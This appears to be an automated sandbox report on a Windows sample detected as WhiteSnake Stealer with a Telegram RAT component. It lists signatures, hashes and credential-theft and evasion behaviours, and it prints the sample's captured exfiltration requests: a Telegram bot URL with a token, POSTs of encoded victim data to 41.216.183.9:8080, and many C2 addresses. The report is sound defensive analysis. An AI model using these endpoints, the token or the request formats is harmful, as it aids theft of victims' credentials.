Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1545189
MD5:	d5b8ac0d80c99e7dda0d9df17c159f3d
SHA1:	ae1e0aeb3fbba55999b74047ee2b8bb4e45f108a
SHA256:	c330322b774eb263b008178ff707e13b843fd7df62445cca3c52356509c26f78
Tags:	exeuser-Bitsight
Infos:

Detection

WhiteSnake Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Multi AV Scanner detection for submitted file

Sigma detected: Capture Wi-Fi password

Suricata IDS alerts for network traffic

Yara detected Telegram RAT

Yara detected WhiteSnake Stealer

.NET source code contains very large strings

.NET source code references suspicious native API functions

AI detected suspicious sample

Found many strings related to Crypto-Wallets (likely being stolen)

Machine Learning detection for dropped file

Machine Learning detection for sample

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal WLAN passwords

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses netsh to modify the Windows network and firewall settings

Uses the Telegram API (likely for C&C communication)

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Contains functionality to call native functions

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Enables driver privileges

Enables security privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Communication To Uncommon Destination Ports

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Signatures

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Found malware configuration

Source: build.exe.6500.2.memstrmin

Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7722280561:AAEgRsAuRdqeD2qmEUjdhEM6F9R5eAxwIT4/sendMessage"}

Multi AV Scanner detection for submitted file

Source: file.exe

ReversingLabs: Detection: 39%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\build.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 2_2_00007FFAACCE7A21 CryptUnprotectData,		2_2_00007FFAACCE7A21
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 2_2_00007FFAACCE7B6D CryptUnprotectData,		2_2_00007FFAACCE7B6D

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:63170 version: TLS 1.2

Source: file.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 4x nop then jmp 00007FFAACCF0C09h	2_2_00007FFAACCF0607
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 4x nop then dec eax	2_2_00007FFAACCE6030
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 4x nop then jmp 00007FFAACCF1661h	2_2_00007FFAACCEF356
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 4x nop then jmp 00007FFAACCF1E1Ah	2_2_00007FFAACCF1BD8
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 4x nop then jmp 00007FFAACCF1661h	2_2_00007FFAACCF0D8E
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 4x nop then dec eax	2_2_00007FFAACCF163D
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 4x nop then jmp 00007FFAACCF1661h	2_2_00007FFAACCF00A5
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 4x nop then jmp 00007FFAACCE6C9Ch	2_2_00007FFAACCE6A99
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 4x nop then jmp 00007FFAACCF2320h	2_2_00007FFAACCF229C
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 4x nop then jmp 00007FFAACCF1661h	2_2_00007FFAACCF1279

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2050601 - Severity 1 - ET MALWARE [ANY.RUN] WhiteSnake Stealer HTTP Request : 192.168.2.7:49700 -> 41.216.183.9:8080
Source: Network traffic	Suricata IDS: 2050602 - Severity 1 - ET MALWARE [ANY.RUN] WhiteSnake Stealer HTTP POST Report Exfiltration : 192.168.2.7:49700 -> 41.216.183.9:8080
Source: Network traffic	Suricata IDS: 2045868 - Severity 1 - ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound) : 192.168.2.7:63169 -> 209.38.221.184:8080

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 0.2.file.exe.36bd1e8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.3685570.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\build.exe, type: DROPPED

Detected TCP or UDP traffic on non-standard ports

Source: global traffic	TCP traffic: 192.168.2.7:49700 -> 41.216.183.9:8080
Source: global traffic	TCP traffic: 192.168.2.7:63169 -> 209.38.221.184:8080

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /bot7722280561:AAEgRsAuRdqeD2qmEUjdhEM6F9R5eAxwIT4/sendMessage?chat_id=7734728653&text=%23Software%20%20%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E927537%3C%2Fi%3E%0A%0A%3Cb%3EReport%20size%3A%3C%2Fb%3E%200.12Mb%0A&reply_markup=%7B%22inline_keyboard%22%3A%5B%5B%7B%22text%22%3A%22Download%22%2C%22url%22%3A%22http%3A%2F%2F209.38.221.184%3A8080%2Fget%2FI85OAzj7Op%2FyLWFd_user%40927537_report.wsr%22%7D%2C%7B%22text%22%3A%22Open%22%2C%22url%22%3A%22http%3A%2F%2F127.0.0.1%3A18772%2FhandleOpenWSR%3Fr%3Dhttp%3A%2F%2F209.38.221.184%3A8080%2Fget%2FI85OAzj7Op%2FyLWFd_user%40927537_report.wsr%22%7D%5D%5D%7D&parse_mode=HTML HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line?fields=query,country HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /sendData?pk=MDhCREMyMTRGMDQ3ODIxQUI0NDJDRjRDQ0IzMEMxMUQ=&ta=U29mdHdhcmU=&un=ZnJvbnRkZXNr&pc=OTI3NTM3&co=VW5pdGVkIFN0YXRlcw==&wa=MA==&be=MA== HTTP/1.1Host: 41.216.183.9:8080Content-Length: 123400Expect: 100-continueConnection: Keep-Alive

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 208.95.112.1 208.95.112.1

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: ATT-INTERNET4US ATT-INTERNET4US
Source: Joe Sandbox View	ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View	ASN Name: AS40676US AS40676US

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

May check the online IP address of the machine

Source: unknown

DNS query: name: ip-api.com

Source: unknown	TCP traffic detected without corresponding DNS query: 41.216.183.9
Source: unknown	TCP traffic detected without corresponding DNS query: 41.216.183.9
Source: unknown	TCP traffic detected without corresponding DNS query: 41.216.183.9
Source: unknown	TCP traffic detected without corresponding DNS query: 41.216.183.9
Source: unknown	TCP traffic detected without corresponding DNS query: 41.216.183.9
Source: unknown	TCP traffic detected without corresponding DNS query: 41.216.183.9
Source: unknown	TCP traffic detected without corresponding DNS query: 41.216.183.9
Source: unknown	TCP traffic detected without corresponding DNS query: 41.216.183.9
Source: unknown	TCP traffic detected without corresponding DNS query: 41.216.183.9
Source: unknown	TCP traffic detected without corresponding DNS query: 41.216.183.9
Source: unknown	TCP traffic detected without corresponding DNS query: 41.216.183.9
Source: unknown	TCP traffic detected without corresponding DNS query: 41.216.183.9
Source: unknown	TCP traffic detected without corresponding DNS query: 41.216.183.9
Source: unknown	TCP traffic detected without corresponding DNS query: 41.216.183.9
Source: unknown	TCP traffic detected without corresponding DNS query: 41.216.183.9
Source: unknown	TCP traffic detected without corresponding DNS query: 41.216.183.9
Source: unknown	TCP traffic detected without corresponding DNS query: 41.216.183.9
Source: unknown	TCP traffic detected without corresponding DNS query: 41.216.183.9
Source: unknown	TCP traffic detected without corresponding DNS query: 41.216.183.9
Source: unknown	TCP traffic detected without corresponding DNS query: 41.216.183.9
Source: unknown	TCP traffic detected without corresponding DNS query: 41.216.183.9
Source: unknown	TCP traffic detected without corresponding DNS query: 41.216.183.9
Source: unknown	TCP traffic detected without corresponding DNS query: 209.38.221.184
Source: unknown	TCP traffic detected without corresponding DNS query: 209.38.221.184
Source: unknown	TCP traffic detected without corresponding DNS query: 209.38.221.184
Source: unknown	TCP traffic detected without corresponding DNS query: 209.38.221.184
Source: unknown	TCP traffic detected without corresponding DNS query: 209.38.221.184
Source: unknown	TCP traffic detected without corresponding DNS query: 209.38.221.184
Source: unknown	TCP traffic detected without corresponding DNS query: 209.38.221.184
Source: unknown	TCP traffic detected without corresponding DNS query: 209.38.221.184
Source: unknown	TCP traffic detected without corresponding DNS query: 209.38.221.184
Source: unknown	TCP traffic detected without corresponding DNS query: 209.38.221.184
Source: unknown	TCP traffic detected without corresponding DNS query: 209.38.221.184
Source: unknown	TCP traffic detected without corresponding DNS query: 209.38.221.184
Source: unknown	TCP traffic detected without corresponding DNS query: 209.38.221.184
Source: unknown	TCP traffic detected without corresponding DNS query: 209.38.221.184
Source: unknown	TCP traffic detected without corresponding DNS query: 209.38.221.184
Source: unknown	TCP traffic detected without corresponding DNS query: 209.38.221.184
Source: unknown	TCP traffic detected without corresponding DNS query: 209.38.221.184
Source: unknown	TCP traffic detected without corresponding DNS query: 209.38.221.184
Source: unknown	TCP traffic detected without corresponding DNS query: 209.38.221.184
Source: unknown	TCP traffic detected without corresponding DNS query: 209.38.221.184
Source: unknown	TCP traffic detected without corresponding DNS query: 209.38.221.184
Source: unknown	TCP traffic detected without corresponding DNS query: 209.38.221.184
Source: unknown	TCP traffic detected without corresponding DNS query: 209.38.221.184
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /bot7722280561:AAEgRsAuRdqeD2qmEUjdhEM6F9R5eAxwIT4/sendMessage?chat_id=7734728653&text=%23Software%20%20%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E927537%3C%2Fi%3E%0A%0A%3Cb%3EReport%20size%3A%3C%2Fb%3E%200.12Mb%0A&reply_markup=%7B%22inline_keyboard%22%3A%5B%5B%7B%22text%22%3A%22Download%22%2C%22url%22%3A%22http%3A%2F%2F209.38.221.184%3A8080%2Fget%2FI85OAzj7Op%2FyLWFd_user%40927537_report.wsr%22%7D%2C%7B%22text%22%3A%22Open%22%2C%22url%22%3A%22http%3A%2F%2F127.0.0.1%3A18772%2FhandleOpenWSR%3Fr%3Dhttp%3A%2F%2F209.38.221.184%3A8080%2Fget%2FI85OAzj7Op%2FyLWFd_user%40927537_report.wsr%22%7D%5D%5D%7D&parse_mode=HTML HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line?fields=query,country HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: ip-api.com
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: unknown

HTTP traffic detected: POST /sendData?pk=MDhCREMyMTRGMDQ3ODIxQUI0NDJDRjRDQ0IzMEMxMUQ=&ta=U29mdHdhcmU=&un=ZnJvbnRkZXNr&pc=OTI3NTM3&co=VW5pdGVkIFN0YXRlcw==&wa=MA==&be=MA== HTTP/1.1Host: 41.216.183.9:8080Content-Length: 123400Expect: 100-continueConnection: Keep-Alive

Source: build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://101.126.19.171:80
Source: build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://101.43.160.136:8080
Source: build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://107.161.20.142:8080
Source: build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://116.202.101.219:8080
Source: build.exe, 00000002.00000002.2295681999.0000026B66D06000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:18772/handleOpenWSR?r=
Source: build.exe, 00000002.00000002.2295681999.0000026B66DAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:18772/handleOpenWSR?r=http://209.38.221.184:8080/get/I85OAzj7Op/yLWFd_user
Source: build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://129.151.109.160:8080
Source: build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://132.145.17.167:9090
Source: build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://147.28.185.29:80
Source: build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://159.203.174.113:8090
Source: build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://167.235.70.96:8080
Source: build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://168.138.211.88:8099
Source: build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://18.228.80.130:80
Source: build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.217.98.121:80
Source: build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.217.98.121:8080
Source: build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://194.164.198.113:8080
Source: build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://20.78.55.47:8080
Source: build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://206.166.251.4:8080
Source: build.exe, 00000002.00000002.2295681999.0000026B66D06000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://209.38.221.184
Source: build.exe, 00000002.00000002.2295681999.0000026B66D06000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://209.38.221.184:8080
Source: build.exe, 00000002.00000002.2295681999.0000026B66D06000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://209.38.221.184:8080/%79%4C%57%46%64%5F%66%72%6F%6E%74%64%65%73%6B%40%39%32%37%35%33%37%5F%72%
Source: build.exe, 00000002.00000002.2295681999.0000026B66B4C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://209.38.221.184:8080/I85OAzj7Op/yLWFd_user
Source: build.exe, 00000002.00000002.2295681999.0000026B66D06000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://209.38.221.184:8080/get
Source: build.exe, 00000002.00000002.2295681999.0000026B66DAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://209.38.221.184:8080/get/I85OAzj7Op/yLWFd_user
Source: build.exe, 00000002.00000002.2295681999.0000026B66D06000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://209.38.221.184:8080/yLWFd_user
Source: build.exe, 00000002.00000002.2295681999.0000026B66D06000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://209.38.221.184:8080/yLWFd_user%40927537_report.wsr
Source: build.exe, 00000002.00000002.2295681999.0000026B66D06000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://209.38.221.184:80802
Source: build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://38.207.174.88:8080
Source: build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://38.60.191.38:80
Source: build.exe, 00000002.00000002.2295681999.0000026B66CE0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://41.216.183.9:8080
Source: build.exe, 00000002.00000002.2295681999.0000026B66CE0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://41.216.183.9:8080/sendData
Source: build.exe, 00000002.00000002.2295681999.0000026B66CE0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://41.216.183.9:8080/sendData?pk=MDhCREMyMTRGMDQ3ODIxQUI0NDJDRjRDQ0IzMEMxMUQ=&ta=U29mdHdhcmU=&un
Source: build.exe, 00000002.00000002.2295681999.0000026B66CE0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://41.216.183.9:80802
Source: build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://41.87.207.180:9090
Source: build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://46.235.26.83:8080
Source: build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://47.96.78.224:8080
Source: build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.159.4.50:8080
Source: build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://65.49.205.24:8080
Source: build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://67.230.176.97:8080
Source: build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://8.216.92.21:8080
Source: build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://8.219.110.16:9999
Source: build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://8.222.143.111:8080
Source: build.exe, 00000002.00000002.2295681999.0000026B66D86000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: file.exe, 00000000.00000002.1238204446.0000000003685000.00000004.00000800.00020000.00000000.sdmp, build.exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: file.exe, 00000000.00000002.1238204446.0000000003685000.00000004.00000800.00020000.00000000.sdmp, build.exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: file.exe, 00000000.00000002.1238204446.0000000003685000.00000004.00000800.00020000.00000000.sdmp, build.exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: file.exe, 00000000.00000002.1238204446.0000000003685000.00000004.00000800.00020000.00000000.sdmp, build.exe.0.dr	String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: file.exe, 00000000.00000002.1238204446.0000000003685000.00000004.00000800.00020000.00000000.sdmp, build.exe.0.dr	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: file.exe, 00000000.00000002.1238204446.0000000003685000.00000004.00000800.00020000.00000000.sdmp, build.exe.0.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: file.exe, 00000000.00000002.1238204446.0000000003685000.00000004.00000800.00020000.00000000.sdmp, build.exe.0.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: file.exe, 00000000.00000002.1238204446.0000000003685000.00000004.00000800.00020000.00000000.sdmp, build.exe.0.dr	String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: file.exe, 00000000.00000002.1238204446.0000000003685000.00000004.00000800.00020000.00000000.sdmp, build.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: file.exe, 00000000.00000002.1238204446.0000000003685000.00000004.00000800.00020000.00000000.sdmp, build.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: file.exe, 00000000.00000002.1238204446.0000000003685000.00000004.00000800.00020000.00000000.sdmp, build.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: build.exe, 00000002.00000002.2295681999.0000026B66B4C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com
Source: build.exe, 00000002.00000002.2295681999.0000026B66B4C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/line?fields=query
Source: file.exe, 00000000.00000002.1238204446.0000000003685000.00000004.00000800.00020000.00000000.sdmp, build.exe.0.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: file.exe, 00000000.00000002.1238204446.0000000003685000.00000004.00000800.00020000.00000000.sdmp, build.exe.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: file.exe, 00000000.00000002.1238204446.0000000003685000.00000004.00000800.00020000.00000000.sdmp, build.exe.0.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: file.exe, 00000000.00000002.1238204446.0000000003685000.00000004.00000800.00020000.00000000.sdmp, build.exe.0.dr	String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: file.exe, 00000000.00000002.1238204446.0000000003685000.00000004.00000800.00020000.00000000.sdmp, build.exe.0.dr	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: file.exe, 00000000.00000002.1238204446.0000000003685000.00000004.00000800.00020000.00000000.sdmp, build.exe.0.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: file.exe, 00000000.00000002.1238204446.0000000003685000.00000004.00000800.00020000.00000000.sdmp, build.exe.0.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: file.exe, 00000000.00000002.1238204446.0000000003685000.00000004.00000800.00020000.00000000.sdmp, build.exe.0.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: file.exe, 00000000.00000002.1238204446.0000000003685000.00000004.00000800.00020000.00000000.sdmp, build.exe.0.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: build.exe, 00000002.00000002.2295681999.0000026B66D06000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.w3.or
Source: build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://138.2.92.67:443
Source: build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://154.9.207.142:443
Source: build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://185.217.98.121:443
Source: build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://192.99.196.191:443
Source: build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://5.196.181.135:443
Source: build.exe, 00000002.00000002.2301595940.0000026B76C54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: build.exe, 00000002.00000002.2295681999.0000026B66D06000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.tele
Source: build.exe, 00000002.00000002.2295681999.0000026B66D86000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000002.00000002.2295681999.0000026B66D06000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: build.exe, 00000002.00000002.2295681999.0000026B66D06000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: build.exe, 00000002.00000002.2295681999.0000026B66D06000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7722280561:AAEgRsAuRdqeD2qmEUjdhEM6F9R5eAxwIT4/sendMessage
Source: build.exe, 00000002.00000002.2295681999.0000026B66D06000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000002.00000002.2295681999.0000026B66D81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7722280561:AAEgRsAuRdqeD2qmEUjdhEM6F9R5eAxwIT4/sendMessage?chat_id=77347
Source: build.exe, 00000002.00000002.2301595940.0000026B76C54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: build.exe, 00000002.00000002.2301595940.0000026B76C54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: build.exe, 00000002.00000002.2301595940.0000026B76C54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: build.exe, 00000002.00000002.2301595940.0000026B76C54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: build.exe, 00000002.00000002.2301595940.0000026B76C54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: build.exe, 00000002.00000002.2301595940.0000026B76C54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
